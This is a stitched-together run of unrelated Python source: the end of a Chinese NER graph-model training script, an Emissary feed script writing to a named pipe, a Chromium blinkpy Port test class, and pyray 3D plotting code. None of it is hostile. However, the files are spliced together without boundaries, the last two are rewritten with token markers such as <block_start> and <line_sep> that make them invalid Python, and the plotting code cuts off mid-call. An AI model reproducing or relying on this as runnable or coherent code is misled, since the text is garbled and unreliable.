              % (best_dev_p, best_dev_r, best_dev_f))
        print("Best test score: p: %.4f, r: %.4f, f: %.4f"
              % (best_test_p, best_test_r, best_test_f))
        gc.collect()
    with open(saved_model_path + "_result.txt", "a") as result_file:
        result_file.write("Best epoch: %d" % best_dev_epoch + '\n')
        result_file.write("Best Dev score: %.4f, r: %.4f, f: %.4f\n"
                          % (best_dev_p, best_dev_r, best_dev_f))
        result_file.write("Test score: %.4f, r: %.4f, f: %.4f\n\n"
                          % (best_test_p, best_test_r, best_test_f))
    with open(saved_model_path + "_best_HP.config", "wb") as hp_file:
        pickle.dump(args, hp_file)


def load_model_decode(model_dir, data, args, name):
    """Load the best checkpoint (<model_dir>_best) and decode one split.

    Returns the predicted label sequences.
    """
    model_dir = model_dir + "_best"
    print("Load Model from file: ", model_dir)
    model = Graph(data, args)
    model.load_state_dict(torch.load(model_dir))
    # load model need consider if the model trained in GPU and load in CPU,
    # or vice versa
    if args.use_gpu:
        model = model.cuda()
    print(("Decode %s data ..." % name))
    start_time = time.time()
    speed, acc, p, r, f, pred_results = evaluate(data, args, model, name)
    end_time = time.time()
    time_cost = end_time - start_time
    print(("%s: time:%.2fs, speed:%.2fst/s; acc: %.4f, p: %.4f, r: %.4f, f: %.4f"
           % (name, time_cost, speed, acc, p, r, f)))
    return pred_results


if __name__ == '__main__':
    parser = argparse.ArgumentParser()
    parser.add_argument('--status', choices=['train', 'test', 'decode'],
                        help='Function status.', default='train')
    parser.add_argument('--use_gpu', type=str2bool, default=True)
    parser.add_argument('--train', help='Training set.',
                        default='data/onto4ner.cn/train.char.bmes')
    parser.add_argument('--dev', help='Developing set.',
                        default='data/onto4ner.cn/dev.char.bmes')
    parser.add_argument('--test', help='Testing set.',
                        default='data/onto4ner.cn/test.char.bmes')
    parser.add_argument('--raw', help='Raw file for decoding.')
    parser.add_argument('--output', help='Output results for decoding.')
    parser.add_argument('--saved_set', help='Path of saved data set.',
                        default='data/onto4ner.cn/saved.dset')
    parser.add_argument('--saved_model', help='Path of saved model.',
                        default="saved_model/model_onto4ner")
    parser.add_argument('--char_emb', help='Path of character embedding file.',
                        default="data/gigaword_chn.all.a2b.uni.ite50.vec")
    parser.add_argument('--word_emb', help='Path of word embedding file.',
                        default="data/ctb.50d.vec")
    parser.add_argument('--use_crf', type=str2bool, default=True)
    parser.add_argument('--use_edge', type=str2bool, default=True,
                        help='If use lexicon embeddings (edge embeddings).')
    parser.add_argument('--use_global', type=str2bool, default=True,
                        help='If use the global node.')
    parser.add_argument('--bidirectional', type=str2bool, default=True,
                        help='If use bidirectional digraph.')
    parser.add_argument('--seed', help='Random seed', default=1023, type=int)
    parser.add_argument('--batch_size', help='Batch size.', default=1, type=int)
    parser.add_argument('--num_epoch', default=100, type=int,
                        help="Epoch number.")
    parser.add_argument('--iters', default=4, type=int,
                        help='The number of Graph iterations.')
    parser.add_argument('--hidden_dim', default=50, type=int,
                        help='Hidden state size.')
    parser.add_argument('--num_head', default=10, type=int,
                        help='Number of transformer head.')
    parser.add_argument('--head_dim', default=20, type=int,
                        help='Head dimension of transformer.')
    parser.add_argument('--tf_drop_rate', default=0.1, type=float,
                        help='Transformer dropout rate.')
    parser.add_argument('--emb_drop_rate', default=0.5, type=float,
                        help='Embedding dropout rate.')
    parser.add_argument('--cell_drop_rate', default=0.2, type=float,
                        help='Aggregation module dropout rate.')
    parser.add_argument('--word_alphabet_size', type=int,
                        help='Word alphabet size.')
    parser.add_argument('--char_alphabet_size', type=int,
                        help='Char alphabet size.')
    parser.add_argument('--label_alphabet_size', type=int,
                        help='Label alphabet size.')
    parser.add_argument('--char_dim', type=int, help='Char embedding size.')
    parser.add_argument('--word_dim', type=int, help='Word embedding size.')
    parser.add_argument('--lr', type=float, default=2e-05)
    parser.add_argument('--lr_decay', type=float, default=0)
    parser.add_argument('--weight_decay', type=float, default=0)
    args = parser.parse_args()

    status = args.status.lower()
    # Seed every RNG in play for reproducibility.
    seed_num = args.seed
    random.seed(seed_num)
    torch.manual_seed(seed_num)
    np.random.seed(seed_num)

    train_file = args.train
    dev_file = args.dev
    test_file = args.test
    raw_file = args.raw
    output_file = args.output
    saved_set_path = args.saved_set
    saved_model_path = args.saved_model
    char_file = args.char_emb
    word_file = args.word_emb

    if status == 'train':
        if os.path.exists(saved_set_path):
            print('Loading saved data set...')
            with open(saved_set_path, 'rb') as f:
                data = pickle.load(f)
        else:
            data = Data()
            data_initialization(data, word_file, train_file, dev_file, test_file)
            data.generate_instance_with_words(train_file, 'train')
            data.generate_instance_with_words(dev_file, 'dev')
            data.generate_instance_with_words(test_file, 'test')
            data.build_char_pretrain_emb(char_file)
            data.build_word_pretrain_emb(word_file)
            if saved_set_path is not None:
                print('Dumping data...')
                with open(saved_set_path, 'wb') as f:
                    pickle.dump(data, f)
        data.show_data_summary()
        # Propagate the alphabet/embedding sizes discovered from the data
        # into args so the model can be built from args alone.
        args.word_alphabet_size = data.word_alphabet.size()
        args.char_alphabet_size = data.char_alphabet.size()
        args.label_alphabet_size = data.label_alphabet.size()
        args.char_dim = data.char_emb_dim
        args.word_dim = data.word_emb_dim
        print_args(args)
        train(data, args, saved_model_path)
    elif status == 'test':
        assert test_file is not None
        if os.path.exists(saved_set_path):
            print('Loading saved data set...')
            with open(saved_set_path, 'rb') as f:
                data = pickle.load(f)
        else:
            print("Cannot find saved data set: ", saved_set_path)
            # Fixed: was exit(0) on an error path.
            sys.exit(1)
        data.generate_instance_with_words(test_file, 'test')
        # Restore the hyper-parameters the best model was trained with.
        with open(saved_model_path + "_best_HP.config", "rb") as f:
            args = pickle.load(f)
        data.show_data_summary()
        print_args(args)
        load_model_decode(saved_model_path, data, args, "test")
    elif status == 'decode':
        assert not (raw_file is None or output_file is None)
        if os.path.exists(saved_set_path):
            print('Loading saved data set...')
            with open(saved_set_path, 'rb') as f:
                data = pickle.load(f)
        else:
            print("Cannot find saved data set: ", saved_set_path)
            # Fixed: was exit(0) on an error path.
            sys.exit(1)
        data.generate_instance_with_words(raw_file, 'raw')
        with open(saved_model_path + "_best_HP.config", "rb") as f:
            args = pickle.load(f)
        data.show_data_summary()
        print_args(args)
        decode_results = load_model_decode(saved_model_path, data, args, "raw")
        data.write_decoded_results(output_file, decode_results, 'raw')
    else:
        print("Invalid argument! Please use valid arguments! (train/test/decode)")
# _*_ coding: utf-8 _*_
#
# This script creates a named pipe (if it doesn't exist)
# and writes the feed name, article title and url to it
# whenever an article is saved to the database.
#
# This is useful for composing systems that constantly read
# the FIFO and do things like emit the data to IRC channels.
#
# You could, for instance, perform fuzzy pattern matching and be
# notified when certain keywords are in the news.
#
# Transmission to a natural language processing/translation service
# can also be done in a script or by reading a FIFO like the one here.
#
# Whether you use this system to profit, perform intelligence analysis
# or inform your next vote is hopefully up to you!
#
# <NAME>, 2015
# MIT License
# Many big thanks to God, lord of universes.
#
# Fixed for Python 3: `except Exception e` -> `except Exception as e`,
# `e.message` -> str(e), and os.write() now receives bytes.
fifo = "/tmp/emissary.pipe"

import os, stat

if not os.path.exists(fifo):
    try:
        os.mkfifo(fifo)
    except Exception as e:
        cache['app'].log("Error creating %s: %s" % (fifo, str(e)))

# Emissary always executes scripts with an article and its feed in the namespace.
# There is also a dictionary named cache, containing the app object.
# Random aside but through the app object you can access the logging interface and the feed manager.
try:
    # READER BEWARE: Use non-blocking IO or you won't be storing owt.
    fd = os.open(fifo, os.O_CREAT | os.O_WRONLY | os.O_NONBLOCK)
    # os.write takes bytes in Python 3; encode the message explicitly.
    os.write(fd, ("%s: %s\n%s\n" % (feed.name, article.title, article.url)).encode("utf-8"))
    os.close(fd)
    del fd
except Exception:
    # Usually due to there not being a reader fd known to the kernel.
    pass

del os, stat, fifo
# Copyright (C) 2010 Google Inc. All rights reserved. # # Redistribution and use in source and binary forms, with or without # modification, are permitted provided that the following conditions are # met: # # * Redistributions of source code must retain the above copyright # notice, this list of conditions and the following disclaimer. # * Redistributions in binary form must reproduce the above # copyright notice, this list of conditions and the following disclaimer # in the documentation and/or other materials provided with the # distribution. # * Neither the name of Google Inc. nor the names of its # contributors may be used to endorse or promote products derived from # this software without specific prior written permission. # # THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS # "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT # LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR # A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT # OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, # SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT # LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, # DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY # THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT # (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE # OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. 
"""Unit testing base class for Port implementations."""<import_stmt>collections<import_stmt>optparse<import_from_stmt>blinkpy.common exit_codes<import_from_stmt>blinkpy.common.system.executive ScriptError<import_from_stmt>blinkpy.common.system.executive_mock MockExecutive<import_from_stmt>blinkpy.common.system.log_testing LoggingTestCase<import_from_stmt>blinkpy.common.system.system_host SystemHost<import_from_stmt>blinkpy.common.system.system_host_mock MockSystemHost<import_from_stmt>blinkpy.web_tests.port.base Port<class_stmt>FakePrinter(object)<block_start><def_stmt>write_update self msg<block_start><pass><block_end><def_stmt>write_throttled_update self msg<block_start><pass><block_end><block_end><class_stmt>PortTestCase(LoggingTestCase)<block_start>"""Tests that all Port implementations must pass."""<line_sep># Some tests in this class test or override protected methods # pylint: disable=protected-access HTTP_PORTS=(8000 8080 8443)<line_sep>WEBSOCKET_PORTS=(8880 )<line_sep># Subclasses override this to point to their Port subclass. os_name=<none><line_sep>os_version=<none><line_sep>port_maker=Port<line_sep>port_name=<none><line_sep>full_port_name=<none><def_stmt>make_port self host=<none> port_name=<none> options=<none> os_name=<none> os_version=<none> **kwargs<block_start>host=host<or>MockSystemHost(os_name=(os_name<or>self.os_name) os_version=(os_version<or>self.os_version))<line_sep>options=options<or>optparse.Values({'configuration':'Release' 'use_xvfb':<true>})<line_sep>port_name=port_name<or>self.port_name<line_sep>port_name=self.port_maker.determine_full_port_name(host options port_name)<line_sep><return>self.port_maker(host port_name options=options **kwargs)<block_end><def_stmt>test_check_build self<block_start>port=self.make_port()<line_sep># Here we override methods to make it appear as though the build # requirements are all met and the driver is found. 
port._check_file_exists=<lambda>path desc:<true><if_stmt>port._dump_reader<block_start>port._dump_reader.check_is_functional=<lambda>:<true><block_end>port._options.build=<true><line_sep>port._check_driver_build_up_to_date=<lambda>config:<true><line_sep>port.check_httpd=<lambda>:<true><line_sep>self.assertEqual(port.check_build(needs_http=<true> printer=FakePrinter()) exit_codes.OK_EXIT_STATUS)<line_sep>logs=''.join(self.logMessages())<line_sep>self.assertNotIn('build requirements' logs)<line_sep># And here, after changing it so that the driver binary is not found, # we get an error exit status and message about build requirements. port._check_file_exists=<lambda>path desc:<false><line_sep>self.assertEqual(port.check_build(needs_http=<true> printer=FakePrinter()) exit_codes.UNEXPECTED_ERROR_EXIT_STATUS)<line_sep>logs=''.join(self.logMessages())<line_sep>self.assertIn('build requirements' logs)<block_end><def_stmt>test_default_batch_size self<block_start>port=self.make_port()<line_sep># Test that we set a finite batch size for sanitizer builds. 
port._options.enable_sanitizer=<true><line_sep>sanitized_batch_size=port.default_batch_size()<line_sep>self.assertIsNotNone(sanitized_batch_size)<block_end><def_stmt>test_default_child_processes self<block_start>port=self.make_port()<line_sep>num_workers=port.default_child_processes()<line_sep>self.assertGreaterEqual(num_workers 1)<block_end><def_stmt>test_default_max_locked_shards self<block_start>port=self.make_port()<line_sep>port.default_child_processes=<lambda>:16<line_sep>self.assertEqual(port.default_max_locked_shards() 4)<line_sep>port.default_child_processes=<lambda>:2<line_sep>self.assertEqual(port.default_max_locked_shards() 1)<block_end><def_stmt>test_default_timeout_ms self<block_start>self.assertEqual(self.make_port().timeout_ms() 6000)<block_end><def_stmt>test_timeout_ms_release self<block_start>self.assertEqual(self.make_port(options=optparse.Values({'configuration':'Release'})).timeout_ms() self.make_port().timeout_ms())<block_end><def_stmt>test_timeout_ms_debug self<block_start>self.assertEqual(self.make_port(options=optparse.Values({'configuration':'Debug'})).timeout_ms() 5<times>self.make_port().timeout_ms())<block_end><def_stmt>make_dcheck_port self options<block_start>host=MockSystemHost(os_name=self.os_name os_version=self.os_version)<line_sep>host.filesystem.write_text_file(self.make_port(host)._build_path('args.gn') 'is_debug=false\ndcheck_always_on = true # comment\n')<line_sep>port=self.make_port(host options=options)<line_sep><return>port<block_end><def_stmt>test_timeout_ms_with_dcheck self<block_start>default_timeout_ms=self.make_port().timeout_ms()<line_sep>self.assertEqual(self.make_dcheck_port(options=optparse.Values({'configuration':'Release'})).timeout_ms() 2<times>default_timeout_ms)<line_sep>self.assertEqual(self.make_dcheck_port(options=optparse.Values({'configuration':'Debug'})).timeout_ms() 5<times>default_timeout_ms)<block_end><def_stmt>test_driver_cmd_line 
self<block_start>port=self.make_port()<line_sep>self.assertTrue(len(port.driver_cmd_line()))<line_sep>options=optparse.Values(dict(additional_driver_flag=['--foo=bar' '--foo=baz']))<line_sep>port=self.make_port(options=options)<line_sep>cmd_line=port.driver_cmd_line()<line_sep>self.assertTrue('--foo=bar'<in>cmd_line)<line_sep>self.assertTrue('--foo=baz'<in>cmd_line)<block_end><def_stmt>test_diff_image__missing_both self<block_start>port=self.make_port()<line_sep>self.assertEqual(port.diff_image(<none> <none>) (<none> <none>))<line_sep>self.assertEqual(port.diff_image(<none> '') (<none> <none>))<line_sep>self.assertEqual(port.diff_image('' <none>) (<none> <none>))<line_sep>self.assertEqual(port.diff_image('' '') (<none> <none>))<block_end><def_stmt>test_diff_image__missing_actual self<block_start>port=self.make_port()<line_sep>self.assertEqual(port.diff_image(<none> 'foo') ('foo' <none>))<line_sep>self.assertEqual(port.diff_image('' 'foo') ('foo' <none>))<block_end><def_stmt>test_diff_image__missing_expected self<block_start>port=self.make_port()<line_sep>self.assertEqual(port.diff_image('foo' <none>) ('foo' <none>))<line_sep>self.assertEqual(port.diff_image('foo' '') ('foo' <none>))<block_end><def_stmt>test_diff_image self<block_start><def_stmt>_path_to_image_diff <block_start><return>'/path/to/image_diff'<block_end>port=self.make_port()<line_sep>port._path_to_image_diff=_path_to_image_diff<line_sep>mock_image_diff='MOCK Image Diff'<def_stmt>mock_run_command args<block_start>port.host.filesystem.write_binary_file(args[4] mock_image_diff)<line_sep><raise>ScriptError(exit_code=1)<block_end># Images are different. port._executive=MockExecutive(run_command_fn=mock_run_command)# pylint: disable=protected-access self.assertEqual(mock_image_diff port.diff_image('EXPECTED' 'ACTUAL')[0])<line_sep># Images are the same. 
port._executive=MockExecutive(exit_code=0)# pylint: disable=protected-access self.assertEqual(<none> port.diff_image('EXPECTED' 'ACTUAL')[0])<line_sep># There was some error running image_diff. port._executive=MockExecutive(exit_code=2)# pylint: disable=protected-access exception_raised=<false><try_stmt><block_start>port.diff_image('EXPECTED' 'ACTUAL')<block_end><except_stmt>ValueError<block_start>exception_raised=<true><block_end>self.assertFalse(exception_raised)<block_end><def_stmt>test_diff_image_crashed self<block_start>port=self.make_port()<line_sep>port._executive=MockExecutive(should_throw=<true> exit_code=2)# pylint: disable=protected-access self.assertEqual(port.diff_image('EXPECTED' 'ACTUAL') (<none> 'Image diff returned an exit code of 2. See http://crbug.com/278596'))<block_end><def_stmt>test_test_configuration self<block_start>port=self.make_port()<line_sep>self.assertTrue(port.test_configuration())<block_end><def_stmt>test_get_crash_log_all_none self<block_start>port=self.make_port()<line_sep>stderr,details,crash_site=port._get_crash_log(<none> <none> <none> <none> newer_than=<none>)<line_sep>self.assertIsNone(stderr)<line_sep>self.assertEqual(details b'crash log for <unknown process name> (pid <unknown>):\n'<concat>b'STDOUT: <empty>\n'<concat>b'STDERR: <empty>\n')<line_sep>self.assertIsNone(crash_site)<block_end><def_stmt>test_get_crash_log_simple self<block_start>port=self.make_port()<line_sep>stderr,details,crash_site=port._get_crash_log('foo' 1234 b'out bar\nout baz' b'err bar\nerr baz\n' newer_than=<none>)<line_sep>self.assertEqual(stderr b'err bar\nerr baz\n')<line_sep>self.assertEqual(details b'crash log for foo (pid 1234):\n'<concat>b'STDOUT: out bar\n'<concat>b'STDOUT: out baz\n'<concat>b'STDERR: err bar\n'<concat>b'STDERR: err baz\n')<line_sep>self.assertIsNone(crash_site)<block_end><def_stmt>test_get_crash_log_non_ascii self<block_start>port=self.make_port()<line_sep>stderr,details,crash_site=port._get_crash_log('foo' 1234 b'foo\xa6bar' 
b'foo\xa6bar' newer_than=<none>)<line_sep>self.assertEqual(stderr b'foo\xa6bar')<line_sep>self.assertEqual(details.decode('utf8' 'replace') u'crash log for foo (pid 1234):\n'<concat>u'STDOUT: foo\ufffdbar\n'<concat>u'STDERR: foo\ufffdbar\n')<line_sep>self.assertIsNone(crash_site)<block_end><def_stmt>test_get_crash_log_newer_than self<block_start>port=self.make_port()<line_sep>stderr,details,crash_site=port._get_crash_log('foo' 1234 b'foo\xa6bar' b'foo\xa6bar' newer_than=1.0)<line_sep>self.assertEqual(stderr b'foo\xa6bar')<line_sep>self.assertEqual(details.decode('utf8' 'replace') u'crash log for foo (pid 1234):\n'<concat>u'STDOUT: foo\ufffdbar\n'<concat>u'STDERR: foo\ufffdbar\n')<line_sep>self.assertIsNone(crash_site)<block_end><def_stmt>test_get_crash_log_crash_site self<block_start>port=self.make_port()<line_sep>stderr,details,crash_site=port._get_crash_log('foo' 1234 b'out bar' b'[1:2:3:4:FATAL:example.cc(567)] Check failed.' newer_than=<none>)<line_sep>self.assertEqual(stderr b'[1:2:3:4:FATAL:example.cc(567)] Check failed.')<line_sep>self.assertEqual(details b'crash log for foo (pid 1234):\n'<concat>b'STDOUT: out bar\n'<concat>b'STDERR: [1:2:3:4:FATAL:example.cc(567)] Check failed.\n')<line_sep>self.assertEqual(crash_site 'example.cc(567)')<block_end><def_stmt>test_default_expectations_files self<block_start>port=self.make_port()<line_sep>self.assertEqual(list(port.default_expectations_files()) [port.path_to_generic_test_expectations_file() port.path_to_webdriver_expectations_file() port.host.filesystem.join(port.web_tests_dir() 'NeverFixTests') port.host.filesystem.join(port.web_tests_dir() 'StaleTestExpectations') port.host.filesystem.join(port.web_tests_dir() 'SlowTests') ])<block_end><def_stmt>test_default_expectations_ordering self<block_start>port=self.make_port()<for_stmt>path port.default_expectations_files()<block_start>port.host.filesystem.write_text_file(path 
'')<block_end>ordered_dict=port.expectations_dict()<line_sep>self.assertEqual(port.path_to_generic_test_expectations_file() list(ordered_dict)[0])<line_sep>options=optparse.Values(dict(additional_expectations=['/tmp/foo' '/tmp/bar']))<line_sep>port=self.make_port(options=options)<for_stmt>path port.default_expectations_files()<block_start>port.host.filesystem.write_text_file(path '')<block_end>port.host.filesystem.write_text_file('/tmp/foo' 'foo')<line_sep>port.host.filesystem.write_text_file('/tmp/bar' 'bar')<line_sep>ordered_dict=port.expectations_dict()<line_sep>self.assertEqual(list(ordered_dict)[-2:] options.additional_expectations)<line_sep>self.assertEqual(list(ordered_dict.values())[-2:] ['foo' 'bar'])<block_end><def_stmt>test_used_expectations_files self<block_start>options=optparse.Values({'additional_expectations':['/tmp/foo'] 'additional_driver_flag':['flag-specific']})<line_sep>port=self.make_port(options=options)<line_sep>self.assertEqual(list(port.used_expectations_files()) [port.path_to_generic_test_expectations_file() port.path_to_webdriver_expectations_file() port.host.filesystem.join(port.web_tests_dir() 'NeverFixTests') port.host.filesystem.join(port.web_tests_dir() 'StaleTestExpectations') port.host.filesystem.join(port.web_tests_dir() 'SlowTests') port.host.filesystem.join(port.web_tests_dir() 'FlagExpectations' 'flag-specific') '/tmp/foo' ])<block_end><def_stmt>test_path_to_apache_config_file self# Specific behavior may vary by port, so unit test sub-classes may override this. 
<block_start>port=self.make_port()<line_sep>port.host.environ['WEBKIT_HTTP_SERVER_CONF_PATH']='/path/to/httpd.conf'<with_stmt>self.assertRaises(IOError)<block_start>port.path_to_apache_config_file()<block_end>port.host.filesystem.write_text_file('/existing/httpd.conf' 'Hello, world!')<line_sep>port.host.environ['WEBKIT_HTTP_SERVER_CONF_PATH']='/existing/httpd.conf'<line_sep>self.assertEqual(port.path_to_apache_config_file() '/existing/httpd.conf')<line_sep># Mock out _apache_config_file_name_for_platform to avoid mocking platform info. port._apache_config_file_name_for_platform=<lambda>:'httpd.conf'<del_stmt>port.host.environ['WEBKIT_HTTP_SERVER_CONF_PATH']<line_sep>self.assertEqual(port.path_to_apache_config_file() port.host.filesystem.join(port.apache_config_directory() 'httpd.conf'))<line_sep># Check that even if we mock out _apache_config_file_name, the environment variable takes precedence. port.host.environ['WEBKIT_HTTP_SERVER_CONF_PATH']='/existing/httpd.conf'<line_sep>self.assertEqual(port.path_to_apache_config_file() '/existing/httpd.conf')<block_end><def_stmt>test_additional_platform_directory self<block_start>port=self.make_port(options=optparse.Values(dict(additional_platform_directory=['/tmp/foo'])))<line_sep>self.assertEqual(port.baseline_search_path()[0] '/tmp/foo')<block_end><def_stmt>test_virtual_test_suites self# We test that we can load the real web_tests/VirtualTestSuites file properly, so we # use a real SystemHost(). We don't care what virtual_test_suites() returns as long # as it is iterable. <block_start>port=self.make_port(host=SystemHost() port_name=self.full_port_name)<line_sep>self.assertTrue(isinstance(port.virtual_test_suites() collections.Iterable))<block_end><block_end>
<import_stmt>numpy<as>np<import_from_stmt>pyray.shapes.twod.paraboloid *<import_from_stmt>pyray.shapes.twod.functional *<import_from_stmt>pyray.rotation *<import_from_stmt>mpl_toolkits.mplot3d Axes3D<import_stmt>matplotlib.pyplot<as>plt<import_from_stmt>matplotlib cm<import_from_stmt>matplotlib.ticker LinearLocator FormatStrFormatter<import_stmt>matplotlib<as>mpl<import_stmt>os<line_sep>basedir='.\\Images\\RotatingCube\\'<if_stmt>os.name<eq>'posix'<block_start>basedir='Images/RotatingCube/'<block_end><def_stmt>draw_cubic <block_start>fn=<lambda>x y:x<power>3+y<power>3<for_stmt>i range(20)<block_start>im=Image.new("RGB" (2048 2048) "black")<line_sep>draw=ImageDraw.Draw(im 'RGBA')<line_sep>r=general_rotation(np.array([1 0 0]) np.pi/120<times>i)<line_sep>#drawFunctionalXYGridInCircle(draw, r, fn=fn, scale=10.0) im.save(basedir+'im'+str(i)+'.png')<block_end><block_end><def_stmt>three_d_grid <block_start>fig=plt.figure()<line_sep>ax=fig.gca(projection='3d')<line_sep># Make data. X=np.arange(-5 5 0.25)<line_sep>Y=np.arange(-5 5 0.25)<line_sep>X,Y=np.meshgrid(X Y)<line_sep>R=(X<power>3+Y<power>3)<line_sep>Z=R<line_sep># Plot the surface. surf=ax.plot_surface(X Y Z cmap=cm.coolwarm linewidth=0 antialiased=<false>)<line_sep># Customize the z axis. #ax.set_zlim(-1.01, 1.01) #ax.zaxis.set_major_locator(LinearLocator(10)) #ax.zaxis.set_major_formatter(FormatStrFormatter('%.02f')) # Add a color bar which maps values to colors. 
fig.colorbar(surf shrink=0.5 aspect=5)<line_sep>plt.show()<block_end>mpl.rcParams['legend.fontsize']=10<line_sep>fig=plt.figure()<line_sep>ax=fig.gca(projection='3d')<line_sep>theta=np.linspace(0 2<times>np.pi 100)<for_stmt>r np.arange(0.1 1.0 0.1)#r = 1.0 <block_start>x=r<times>np.sin(theta)<line_sep>y=r<times>np.cos(theta)<line_sep>z=x<power>3+y<power>3<line_sep>ax.plot(x y z label='parametric curve')<line_sep>#ax.legend() <block_end>plt.show()<def_stmt>paraboloid_w_grad im_ind=0 scale=200 shift=np.array([1000 1000 0]) opacity=60 basepath='.\\'<block_start>r1=np.eye(4)<line_sep>rot=general_rotation(np.array([0 0 1]) np.pi/20.0<times>(8+im_ind/3.0))<line_sep>j=4<line_sep>r=rotation(3 2<times>np.pi<times>j/30.0)<line_sep>rr=general_rotation(np.array([0 1 0]) np.pi/20.0<times>(im_ind/7.0))<line_sep>r=np.dot(r rr)<line_sep>r=np.dot(r rot)<line_sep>r1[:3 :3]=r<line_sep>im=Image.new("RGB" (2048 2048) "black")<line_sep>draw=ImageDraw.Draw(im 'RGBA')<line_sep>render_scene_4d_axis(draw r1 4 scale shift)<line_sep># This is what draws the pink paraboloid. 
<for_stmt>z np.arange(0.001 3.5 0.02)<block_start>point1=np.array([np.sqrt(z) 0 z])<line_sep>generalized_arc(draw r center=np.array([0 0 z]) vec=np.array([0 0 1]) point=point1 radius=np.sqrt(z) prcnt=1.0 rgba=(255 20 147 50))<block_end>xax1=np.array([-100.0 0 0.0])<line_sep>xax1=np.dot(r xax1)<times>scale+shift<line_sep>xax2=np.array([100.0 0 0.0])<line_sep>xax2=np.dot(r xax2)<times>scale+shift<line_sep>draw.line((xax1[0] xax1[1] xax2[0] xax2[1]) fill=(255 255 0) width=4)<line_sep>xax1=np.array([0.0 -100 0.0])<line_sep>xax1=np.dot(r xax1)<times>scale+shift<line_sep>xax2=np.array([0.0 100 0.0])<line_sep>xax2=np.dot(r xax2)<times>scale+shift<line_sep>draw.line((xax1[0] xax1[1] xax2[0] xax2[1]) fill=(255 255 0) width=4)<line_sep>#gradients(draw,r) pt=shift<line_sep>draw.ellipse((pt[0]-10 pt[1]-10 pt[0]+10 pt[1]+10) fill=(0 255 0))<line_sep>draw_paraboloid_plane(draw r 3.3)<line_sep>draw_paraboloid_plane(draw r 2.0 extent=1.4)<line_sep>draw_paraboloid_plane(draw r 1.0 extent=1.0)<line_sep>im.save(basepath+'im'+str(im_ind)+'.png')<block_end><def_stmt>gradients draw r#for z in [0.3,1.3,2.3,3.3]: <block_start><for_stmt>z [3.3 2.0 1.0]<block_start>x=np.sqrt(z)<for_stmt>x np.arange(-x x x/2)<block_start>y=np.sqrt(z-x<times>x)<line_sep>arrowV1(draw r np.array([y x z]) np.array([1.5<times>y 1.5<times>x z]) (204 102 255))<if_stmt>z<g>3.0<block_start>arrowV1(draw r np.array([-y x z]) np.array([-1.5<times>y 1.5<times>x z]) (204 102 255))<block_end><block_end><block_end><block_end><def_stmt>draw_paraboloid_plane draw r z=3.3 scale=200 shift=np.array([1000 1000 0]) extent=2<block_start>pt1=np.array([extent extent z])<line_sep>pt1=np.dot(r pt1)<times>scale+shift<line_sep>pt2=np.array([extent -extent z])<line_sep>pt2=np.dot(r pt2)<times>scale+shift<line_sep>pt3=np.array([-extent -extent z])<line_sep>pt3=np.dot(r pt3)<times>scale+shift<line_sep>pt4=np.array([-extent extent z])<line_sep>pt4=np.dot(r pt4)<times>scale+shift<line_sep>draw.polygon([(pt1[0] pt1[1]) (pt2[0] pt2[1]) (pt3[0] 
pt3[1]) (pt4[0] pt4[1])] (0 102 255 50))<line_sep>point1=np.array([np.sqrt(z) 0 z])<line_sep>generalized_arc(draw r center=np.array([0 0 z]) vec=np.array([0 0 1]) point=point1 radius=np.sqrt(z) prcnt=1.0 scale=scale rgba=(255 20 10 100) width=10)<block_end><def_stmt>plane_w_arrows im_ind=0 scale=200 shift=np.array([824 824 0]) basepath='.\\'<block_start>r1=np.eye(4)<line_sep>rot=general_rotation(np.array([0 0 1]) np.pi/20.0<times>(8+im_ind/3.0))<line_sep>j=4<line_sep>r=rotation(3 2<times>np.pi<times>j/30.0)<line_sep>rr=general_rotation(np.array([0 1 0]) np.pi/20.0<times>(im_ind/7.0))<line_sep>r=np.dot(r rr)<line_sep>r=np.dot(r rot)<line_sep>r1[:3 :3]=r<line_sep>im=Image.new("RGB" (1648 1648) "black")<line_sep>draw=ImageDraw.Draw(im 'RGBA')<line_sep>pt1=3<times>np.array([1.0 -1.0 0])<line_sep>pt2=3<times>np.array([1.0 1.0 0])<line_sep>z=1.2<power>2+1<line_sep>pt3=3<times>np.array([-1.0 1.0 0])<line_sep>pt4=3<times>np.array([-1.0 -1.0 0])<line_sep>pt1=np.dot(r pt1)<times>scale+shift<line_sep>pt2=np.dot(r pt2)<times>scale+shift<line_sep>pt3=np.dot(r pt3)<times>scale+shift<line_sep>pt4=np.dot(r pt4)<times>scale+shift<line_sep>draw.polygon([(pt1[0] pt1[1]) (pt2[0] pt2[1]) (pt3[0] pt3[1]) (pt4[0] pt4[1])] (0 102 255 50))<line_sep>draw_arrows(draw r rgba=(255 250 47) shift=shift)<line_sep>draw_arrows(draw r rot_angl=np.pi/2.0 rgba=(73 200 250) shift=shift)<line_sep>draw_arrows(draw r rot_angl=np.pi/2.0+np.pi/3 rgba=(255 20 147) shift=shift)<line_sep>arrowV1(draw r np.array([0 0 0]) np.array([0 0 2.5]) shift=shift rgb=(20 200 25))<line_sep>arrowV1(draw r np.array([0 0 0]) np.array([0 0 -2.5]) shift=shift rgb=(255 20 25))<line_sep>im.save(basepath+'im'+str(im_ind)+'.png')<block_end><def_stmt>draw_arrows draw r rot_angl=np.pi/6.0 rgba=(255 20 147) shift=np.array([1000 1000 0])<block_start>base=np.array([0 0 1.5])<for_stmt>theta np.arange(0 np.pi<times>2 2<times>np.pi/3)<block_start>a=np.array([np.cos(theta) np.sin(theta) 0])<line_sep>rr=general_rotation(a 
